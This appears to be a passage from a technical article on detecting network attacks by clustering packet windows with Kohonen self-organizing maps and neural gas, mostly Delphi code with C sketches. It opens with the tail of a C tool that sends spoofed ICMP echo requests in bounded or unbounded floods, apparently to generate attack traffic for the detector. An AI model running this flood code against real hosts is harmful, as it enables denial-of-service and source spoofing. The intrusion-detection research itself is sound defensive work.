Clustering of groups of incoming packets using competitive neural networks
icmp->checksum = in_cksum(icmp, pingsize + ICMPHDRSIZE + IPHDRSIZE + 8);

return sendto(socket, packet, pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8, 0,
              (struct sockaddr *)&destaddr, sizeof(struct sockaddr));
}

int main(int argc, char *argv[])
{
    int s, i;
    int floodloop;

    if (parse_args(argc, argv)) {
        usage(argv[0]);
        return 1;
    }

    resolve_all(dest_name, spoof_name);
    give_info();

    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);   /* raw socket: requires root privileges */
    if (s < 0) {
        perror("socket");
        return 1;
    }

    if (!flood) {
        /* single spoofed ICMP echo request */
        if (icmp_echo_send(s, spoof_addr, dest_addr, pingsize) == -1) {
            printf("%s error sending packet\n", argv[0]);
            perror("");
            return 1;
        }
    } else {
        floodloop = 0;
        if (pingnmbr && (pingnmbr > 0)) {
            /* bounded flood: send pingnmbr packets, pausing pingsleep ms between them */
            printf("sending... packet limit set\n");
            for (i = 0; i < pingnmbr; i++) {
                if (icmp_echo_send(s, spoof_addr, dest_addr, pingsize) == -1) {
                    printf("%s error sending packet\n", argv[0]);
                    perror("");
                    return 1;
                }
                usleep(pingsleep * 1000);
                if (!(floodloop = (floodloop + 1) % 25)) {
                    fprintf(stdout, ".");
                    fflush(stdout);
                }
            }
            printf("\ncomplete, %u packets sent\n", pingnmbr);
        } else {
            /* unbounded flood: loop until interrupted */
            printf("flooding, (. == 25 packets)\n");
            for (;;) {
                if (icmp_echo_send(s, spoof_addr, dest_addr, pingsize) == -1) {
                    printf("%s error sending packet\n", argv[0]);
                    perror("");
                    return 1;
                }
                usleep(900);
                if (!(floodloop = (floodloop + 1) % 25)) {
                    fprintf(stdout, ".");
                    fflush(stdout);
                }
            }
        }
    }

    return 0;
}
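The fragment above is the tail of the packet-generator listing: it finishes building a spoofed ICMP echo request, checksums it, and sends it either once or in a bounded or unbounded flood. The in_cksum routine it calls is presumably defined earlier in the listing and is not reproduced on this page; code of this kind normally relies on the standard one's-complement Internet checksum (RFC 1071). The following is a generic sketch of that checksum, not the author's exact implementation:

#include <stddef.h>
#include <stdint.h>

/* Standard one's-complement Internet checksum (RFC 1071).
   A generic sketch; the in_cksum used in the listing may differ in details. */
static uint16_t rfc1071_cksum(const void *data, size_t len)
{
    const uint16_t *p = data;
    uint32_t sum = 0;

    while (len > 1) {                     /* sum 16-bit words */
        sum += *p++;
        len -= 2;
    }
    if (len == 1)                         /* fold in a trailing odd byte */
        sum += *(const uint8_t *)p;

    sum = (sum >> 16) + (sum & 0xFFFF);   /* fold carries back into 16 bits */
    sum += (sum >> 16);
    return (uint16_t)~sum;
}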

Listing 3. Self-organizing feature map.

TNeuron = class

public

IntVal : TIntArray;

ExtVal : TExtArray;

Pos : Extended;

Status : Extended;

Y : Extended;

MassWeight : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

function FunctionActivation : Extended;

procedure GetAksonValue(a : PExtArray);

procedure Randomization;

procedure Distantion(a : PExtArray);

end;

TLayer = class

public

ExtArr : TExtArray;

Neurons : Array of TNeuron;

QNeurons : integer;

QInputs : integer;

InputValues : Array of Extended;

OutputValues : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

procedure GetInputValues(Values : PExtArray);

procedure GetOutputValues;

procedure Excitement;

procedure randomization;

end;

TKohonenLayer = class(TLayer)

public

eta,sigma : Extended;

h,w : Word;

constructor Init(a : PIntArray; b : PExtArray);

procedure Normalize;

function TheWinnerTakesItAll : integer;

function Classic : integer;

procedure Learning(a : integer; SpeedLearn : Extended);

procedure LearningNeib(a : integer; SpeedLearn : Extended);

procedure SigmaInit(s : Extended);

procedure ConvexCombination(delta : Extended);

procedure NeuralGaz(SpeedLearn : Extended);

end;

procedure TKohonenLayer.SigmaInit(s : Extended);

begin

Sigma:=s;

end;

procedure TKohonenLayer.ConvexCombination(delta : Extended);

var i : integer;

begin

eta:=eta+delta;

sigma:=sigma+0.1-10*delta;

for i:=0 to QInputs-1 do InputValues[i]:=InputValues[i]*eta+(1-eta)/sqrt(QInputs);

end;
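ConvexCombination implements the classic convex-combination initialization trick: while eta grows from 0 toward 1, every input component is blended between the constant 1/sqrt(n), where all weight vectors can safely start, and its true value, so the codebook is dragged gradually into the data region. A minimal sketch of the same blending step in C (the function name and parameters are illustrative, not taken from the listing):

#include <math.h>
#include <stddef.h>

/* Convex-combination preprocessing: blend each input component between
   the constant 1/sqrt(n) (eta = 0) and its real value (eta = 1). */
static void convex_blend(double *x, size_t n, double eta)
{
    const double base = (1.0 - eta) / sqrt((double)n);
    for (size_t i = 0; i < n; i++)
        x[i] = eta * x[i] + base;
}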

constructor TKohonenLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

New : TIntArray;

begin

Inherited Init(a,b);

New:=a^;

H:=New.Value[3];

W:=Round(New.Value[2]/New.Value[3]);

Randomization;

for i:=0 to New.Value[2]-1 do Neurons[i].Pos:=3.75;

eta:=0;

end;

procedure TKohonenLayer.Normalize;

var i : integer;

Sum : Extended;

begin

Sum:=0;

for i:=0 to QInputs-1 do Sum:=Sum+Sqr(InputValues[i]);

for i:=0 to QInputs-1 do

InputValues[i]:=InputValues[i]/Sqrt(Sum);

end;

function TKohonenLayer.TheWinnerTakesItAll : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Neurons[i].Pos>0.75 then

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

for i:=0 to QNeurons-1 do

if i=p then Neurons[i].Pos:=Neurons[i].Pos-0.75

else Neurons[i].Pos:=Neurons[i].Pos+1/QNeurons;

Neurons[p].Y:=1;

GetOutputValues;

TheWinnerTakesItAll:=p;

end;
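TheWinnerTakesItAll adds a simple "conscience" (frequency-sensitivity) term to the competition: a neuron may win only while its Pos credit exceeds 0.75, the winner then pays that threshold back, and every other neuron gains 1/QNeurons per step, so units that win too often are temporarily excluded and dead units eventually get a chance. A compact sketch of the same selection rule (illustrative C; the distances are assumed to be precomputed, as Excitement does in the listing):

#include <stddef.h>

/* Conscience-style winner selection: choose the closest neuron among those
   whose credit exceeds the threshold, then update the credits so that
   frequent winners are temporarily suppressed. */
static int pick_winner_conscience(const double *dist, double *credit,
                                  size_t n, double threshold)
{
    size_t best = 0;
    for (size_t i = 1; i < n; i++)
        if (credit[i] > threshold && dist[i] < dist[best])
            best = i;

    for (size_t i = 0; i < n; i++)
        credit[i] += (i == best) ? -threshold : 1.0 / (double)n;

    return (int)best;
}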

function TKohonenLayer.Classic : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

Neurons[p].Y:=1;

GetOutputValues;

Classic:=p;

end;

procedure TKohonenLayer.Learning(a : integer; SpeedLearn : Extended);

var i : integer;

begin

for i:=1 to QInputs do

Neurons[a].MassWeight[i]:=Neurons[a].MassWeight[i]+

SpeedLearn*(InputValues[i-1]-Neurons[a].MassWeight[i]);

end;

procedure TKohonenLayer.LearningNeib(a : integer; SpeedLearn : Extended);

var i,j : integer;

begin

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-(Sqr((j div w)-(a div w)) + Sqr((j mod h)-(a mod h)))/(2*Sqr(sigma)))

*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;
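LearningNeib is the standard Kohonen update with a Gaussian neighbourhood: every neuron j is pulled toward the input, scaled by exp(-d²(j, winner) / (2σ²)), where d is the distance between the grid positions of j and the winner. A minimal sketch of just the neighbourhood coefficient (C; the row/column decomposition mirrors the listing's j div w and j mod h):

#include <math.h>

/* Gaussian neighbourhood coefficient h(j, winner) on a rectangular SOM grid.
   Rows are taken as index div width and columns as index mod height,
   exactly as in the listing. */
static double som_neighborhood(int j, int winner, int width, int height,
                               double sigma)
{
    const double dr = (double)(j / width)  - (double)(winner / width);
    const double dc = (double)(j % height) - (double)(winner % height);
    return exp(-(dr * dr + dc * dc) / (2.0 * sigma * sigma));
}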

procedure TKohonenLayer.NeuralGaz(SpeedLearn : Extended);

var i,j,k,p : integer;

Mass : Array of Extended;

Min : Extended;

begin

SetLength(Mass,QNeurons);

for i:=0 to QNeurons-1 do Mass[i]:=-1;

p:=0;

for i:=0 to QNeurons-1 do

begin

p:=p+1;

Min:=999999;

k:=-1;

for j:=0 to QNeurons-1 do

begin

if Neurons[j].Y<Min then

if Mass[j]=-1 then

begin

k:=j;

Min:=Neurons[j].Y;

end;

end;

Mass[k]:=p;

end;

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-Mass[j]/Sigma)*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;
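NeuralGaz is the rank-based "neural gas" rule: the neurons are ordered by their distance to the current input, and the neuron of rank k moves toward the input with strength η·exp(-k/σ), so nearby codebook vectors move a lot while distant ones barely move (in the listing the ranks start at 1, so even the closest neuron is slightly damped). A compact sketch of one such step (illustrative C with O(n²) ranking, as in the listing; rank 0 here denotes the closest neuron):

#include <math.h>
#include <stddef.h>

/* One neural-gas update: rank the neurons by distance to the input
   (rank 0 = closest) and move each weight vector toward the input
   with strength eta * exp(-rank / sigma). */
static void neural_gas_step(double **w, const double *dist, const double *x,
                            size_t n_neurons, size_t n_inputs,
                            double eta, double sigma)
{
    for (size_t j = 0; j < n_neurons; j++) {
        size_t rank = 0;                       /* how many neurons are closer */
        for (size_t k = 0; k < n_neurons; k++)
            if (dist[k] < dist[j])
                rank++;

        const double h = eta * exp(-(double)rank / sigma);
        for (size_t i = 0; i < n_inputs; i++)
            w[j][i] += h * (x[i] - w[j][i]);
    }
}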

constructor TNeuron.Init(a : PIntArray; b : PExtArray);

var

New : TIntArray;

begin

New:=a^;

ExtVal:=b^;

IntVal:=TIntArray.Init(2);

IntVal.Value[0]:=New.Value[0]+1;

IntVal.Value[1]:=New.Value[1];

SetLength(MassWeight,IntVal.Value[0]);

if IntVal.Value[0]>0 then MassWeight[0]:=0;

Status:=0;

Y:=0;

Pos:=0;

end;

procedure TNeuron.GetAksonValue(a : PExtArray);

var

i : integer;

b : TExtArray;

begin

b:=a^;

Status:=MassWeight[0];

for i:=1 to IntVal.Value[0]-1 do Status:=Status+MassWeight[i]*b.Value[i-1];

Y:=FunctionActivation;

end;

procedure TNeuron.Distantion(a : PExtArray);

var i : integer;

b : TExtArray;

begin

b:=a^;

Status:=0;

Y:=0; // reset the accumulator: the squared distance is summed into Y below

for i:=1 to IntVal.Value[0]-1 do Y:=Y+Sqr(MassWeight[i]-b.Value[i-1]);

Y:=Sqrt(Y);

end;

function TNeuron.FunctionActivation : Extended;

Var m : Extended;

begin

case IntVal.Value[1] of

1 : m:=1/(1+exp(-ExtVal.Value[0]*Status));

2 : m:=ExtVal.Value[0]*Status;

end;

FunctionActivation:=m;

end;

procedure TNeuron.Randomization;

var i : integer;

begin

for i:=0 to IntVal.Value[0]-1 do MassWeight[i]:=random(255);

end;

constructor TLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

//c : TIntArray;

IntArr : TIntArray;

begin

IntArr:=a^;

QInputs:=IntArr.Value[0];

QNeurons:=IntArr.Value[2];

IntArr.NewLength(2);

ExtArr:=b^;

SetLength(Neurons,QNeurons); // SetLength takes an element count, not a byte size

for i:=0 to QNeurons-1 do Neurons[i]:=TNeuron.Init(@IntArr,b);

SetLength(InputValues,QInputs);

for i:=0 to QInputs-1 do InputValues[i]:=0;

SetLength(OutputValues,QNeurons);

end;

procedure TLayer.GetInputValues(Values : PExtArray);

var i : integer;

a : TExtArray;

begin

a:=Values^;

for i:=0 to QInputs-1 do InputValues[i]:=a.Value[i];

end;

procedure TLayer.Excitement;

var i : integer;

a : TExtArray;

begin

a:=TExtArray.Init(QInputs);

for i:=0 to QInputs-1 do a.Value[i]:=InputValues[i];

for i:=0 to QNeurons-1 do Neurons[i].Distantion(@a);//GetAksonValue(@a);

GetOutputValues;

end;

procedure TLayer.GetOutputValues;

var i : integer;

begin

for i:=0 to QNeurons-1 do OutputValues[i]:=Neurons[i].Y;

end;

procedure TLayer.randomization;

var i : integer;

begin

for i:=0 to QNeurons-1 do Neurons[i].Randomization;

end;

procedure TForm1.Button2Click(Sender: TObject);

var

F : TextFile;

i,j,p,s1,s2,k : integer;

Str : String;

Ch : Char;

Sum : integer;

Temp : Array of String;

begin

OpenDialog1.Filter:='Log file|*.log|';

if (OpenDialog1.Execute) and fileExists(OpenDialog1.FileName) then

begin

AssignFile(F,OpenDialog1.FileName);

Reset(F);

ReadLn(F);

Read(F,Q);

SetLength(Prot,Q);

SetLength(Host,Q);

SetLength(LocalH,Q);

SetLength(Frag,Q);

SetLength(Size,Q);

SetLength(Proc,Q);

SetLength(Active,Q);

SetLength(HACK,Q);

MyList.Clear;

MyList.Add('No.');

MyList.Add('Protocol');

MyList.Add('Host');

MyList.Add('Local LAN');

MyList.Add('Fragmentation');

MyList.Add('Size');

MyList.Add('CPU %%');

MyList.Add('Responds');

StringGrid1.RowCount:=Q+1;

StringGrid1.Rows[0]:=MyList;

for i:=0 to Q-1 do

begin

MyList.Clear;

Read(F,j);

MyList.Add(IntToStr(j));

//Memo4.Lines.Add(IntToStr(j));

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Prot[i]:='';

While(ch<>' ') do

begin

Prot[i]:=Prot[i]+Ch;

Read(F,Ch);

end;

MyList.Add(Prot[i]);

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Host[i]:='';

While(ch<>' ') do

begin

Host[i]:=Host[i]+Ch;

Read(F,Ch);

end;

MyList.Add(Host[i]);

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then LocalH[i]:=1 else LocalH[i]:=0;

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then Frag[i]:=1 else Frag[i]:=0;

Read(F,Size[i]);

MyList.Add(IntToStr(Size[i]));

Read(F,Proc[i]);

MyList.Add(IntToStr(Proc[i]));

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then Active[i]:=1 else Active[i]:=0;

StringGrid1.Rows[j]:=MyList;

Read(F,Ch);

if Ch='H' then HACK[i]:=1 else HACK[i]:=0;

//Memo4.Lines.Add('**************');

end;

//Memo4.Lines.Add(IntToStr(Q));

CloseFile(F);

SetLength(Temp,10);

SetLength(Mass,12*(Q-11)); // Q-11 windows of 12 features each: the loop below writes Mass[12*i..12*i+11]

SetLength(SHack,Q-1);

for i:=0 to Q-12 do

begin

Mass[12*i]:=0;

for j:=0 to 9 do Mass[12*i]:=Mass[12*i]+LocalH[i+j];

Mass[12*i+1]:=0;

for j:=0 to 9 do Mass[12*i+1]:=Mass[12*i+1]+Frag[i+j];

Mass[12*i+2]:=0;

Mass[12*i+3]:=0;

for j:=0 to 9 do

if Prot[i+j]='TCP' then Mass[12*i+2]:=Mass[12*i+2]+1;

for j:=0 to 9 do

if Prot[i+j]='UDP' then Mass[12*i+3]:=Mass[12*i+3]+1;

Sum:=1;

s1:=0;

for j:=0 to 9 do

begin

Str:=Host[i+j];

p:=0;

for k:=0 to 9 do

begin

if Str=Host[i+k] then

begin

p:=p+1;

s2:=k;

end;

end;

if p>Sum then

begin

Sum:=p;

s1:=s2;

end;

end;

Mass[12*i+4]:=Sum;

Mass[12*i+5]:=LocalH[i+s1];

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Proc[i+j];

Mass[12*i+6]:=Sum/10;

Mass[12*i+7]:=Proc[i+9]-Proc[i];

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Size[i+j];

Mass[12*i+8]:=Sum/10;

Sum:=0;

for j:=0 to 9 do

if (Size[i+j]>=0.8*Mass[12*i+8])and

(Size[i+j]<=1.2*Mass[12*i+8]) then Sum:=Sum+1;

Mass[12*i+9]:=Sum;

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Active[i+j];

Mass[12*i+10]:=Sum;

for j:=0 to 9 do Temp[j]:=Host[i+j];

for j:=0 to 8 do

begin

Str:=Temp[j];

for k:=0 to 9 do

if k<>j then

if Str=Temp[k] then Temp[k]:='';

end;

Sum:=0;

for j:=0 to 9 do

if Temp[j]<>'' then Sum:=Sum+1;

Mass[12*i+11]:=Sum;

Sum:=0;

for j:=0 to 9 do Sum:=Sum+HACK[i+j];

SHack[i]:=Sum;

end;

end;

end;
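Button2Click both parses the log and builds the training set: for every window of 10 consecutive packets it fills 12 consecutive cells of Mass with window statistics, and SHack records how many packets of the window are labelled as an attack (this label is used only to colour the trained map, not for training). A hedged summary of the vector layout as a C enum; the feature names are descriptive labels inferred from the code, not identifiers from the listing:

/* Index layout of one 12-component window vector stored at Mass[12*i + ...]. */
enum window_feature {
    F_LOCAL_COUNT    = 0,   /* packets coming from the local LAN            */
    F_FRAG_COUNT     = 1,   /* fragmented packets                           */
    F_TCP_COUNT      = 2,   /* TCP packets                                  */
    F_UDP_COUNT      = 3,   /* UDP packets                                  */
    F_TOP_HOST_FREQ  = 4,   /* occurrences of the most frequent host        */
    F_TOP_HOST_LOCAL = 5,   /* whether that host belongs to the local LAN   */
    F_CPU_MEAN       = 6,   /* mean CPU load over the window                */
    F_CPU_DELTA      = 7,   /* CPU load change from first to last packet    */
    F_SIZE_MEAN      = 8,   /* mean packet size                             */
    F_SIZE_TYPICAL   = 9,   /* packets within 20% of the mean size          */
    F_ACTIVE_COUNT   = 10,  /* packets flagged as active                    */
    F_DISTINCT_HOSTS = 11   /* number of distinct hosts in the window       */
};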

procedure TForm1.InitializationMap;

var i,j,p : integer;

begin

for i:=0 to H*W-1 do

begin

p:=Random(Q-13);

for j:=0 to 11 do // copy all 12 components of the sampled training vector

KMap.Neurons[i].MassWeight[j+1]:=Mass[12*p+j];

end;

end;

procedure TForm1.Button3Click(Sender: TObject);

var i,j,p,k,m : integer;

Quant,Winner : integer;

Part : TExtArray;

SMax,SMin : Extended;

begin

InitializationMap;

for i:=0 to Image1.Height-1 do

for j:=0 to Image1.Width-1 do

Image1.Picture.Bitmap.Canvas.Pixels[i,j]:=RGB(150,150,150);

Quant:=StrToInt(Edit3.Text);

Part:=TExtArray.Init(12);

SMax:=0.7;

SMin:=0.0001;

ProgressBar1.Max:=Quant;

ProgressBar1.Position:=0;

for i:=0 to Quant-1 do

begin

KMap.SigmaInit(10*(1-i/Quant)+0.1);

p:=Random(Q-12);

for j:=0 to 11 do Part.Value[j]:=Mass[12*p+j];

KMap.GetInputValues(@Part);

KMap.Excitement;

Case RadioGroup1.ItemIndex of

0:

begin

Winner:=KMap.Classic;

if CheckBox1.Checked then KMap.LearningNeib(Winner,SMax-(SMax-SMin)*i/Quant)

else KMap.Learning(Winner,SMax-(SMax-SMin)*i/Quant);

end;

1:

begin

Winner:=KMap.TheWinnerTakesItAll;

if CheckBox1.Checked then KMap.LearningNeib(Winner,SMax-(SMax-SMin)*i/Quant)

else KMap.Learning(Winner,SMax-(SMax-SMin)*i/Quant)

end;

2:

begin

KMap.NeuralGaz(SMax-(SMax-SMin)*i/Quant);

end;

end;

ProgressBar1.StepBy(1);

end;

ProgressBar1.Position:=0;

for i:=0 to KMap.QNeurons-1 do

KMap.Neurons[i].MassWeight[0]:=0;

for i:=0 to Q-12 do

begin

for j:=0 to 11 do Part.Value[j]:=Mass[12*i+j];

KMap.GetInputValues(@Part);

KMap.Excitement;

Winner:=KMap.Classic;

KMap.Neurons[Winner].MassWeight[0]:=1;

//Memo4.Lines.Add(IntToStr(Winner));

if SHack[i]>=8 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(255,0,0);

end

else if SHack[i]=7 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(255,40,40);

end

else if SHack[i]=6 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,80,80);

end

else if SHack[i]=5 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,120,120);

end

else if SHack[i]=4 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,160,160);

end

else if SHack[i]=3 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,200,200);

end

else

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,225,225);

end;

//Image2.Picture.Bitmap.Canvas.

//.Pixels[j,i]:=RGB(

end;

for i:=0 to KMap.QNeurons-1 do

begin

if KMap.Neurons[i].MassWeight[0]=1 then

begin

Memo3.Lines.Add('Neuron '+IntToStr(i));

for j:=0 to KMap.QInputs-1 do

Memo3.Lines.Add(FloatToStr(KMap.Neurons[i].MassWeight[j]));

end;

end;

end;
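Button3Click trains the map with linearly decaying schedules: the neighbourhood radius σ shrinks from about 10.1 to 0.1 and the learning rate from 0.7 to 0.0001 over Quant iterations, after which every window is classified once more and the winning cell is painted from red (8-10 attack-labelled packets in the window) through pink shades down to light grey (few or none). A small self-contained C sketch of just those two schedules (function names are illustrative):

#include <stdio.h>

/* Linear schedules used during training in the listing: the neighbourhood
   radius decays from about 10.1 to 0.1 and the learning rate from 0.7 to
   0.0001 over `quant` iterations. */
static double sigma_at(int i, int quant)
{
    return 10.0 * (1.0 - (double)i / quant) + 0.1;
}

static double rate_at(int i, int quant)
{
    const double smax = 0.7, smin = 0.0001;
    return smax - (smax - smin) * (double)i / quant;
}

int main(void)
{
    const int quant = 1000;
    for (int i = 0; i <= quant; i += 250)
        printf("step %4d: sigma = %6.3f, eta = %.4f\n",
               i, sigma_at(i, quant), rate_at(i, quant));
    return 0;
}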
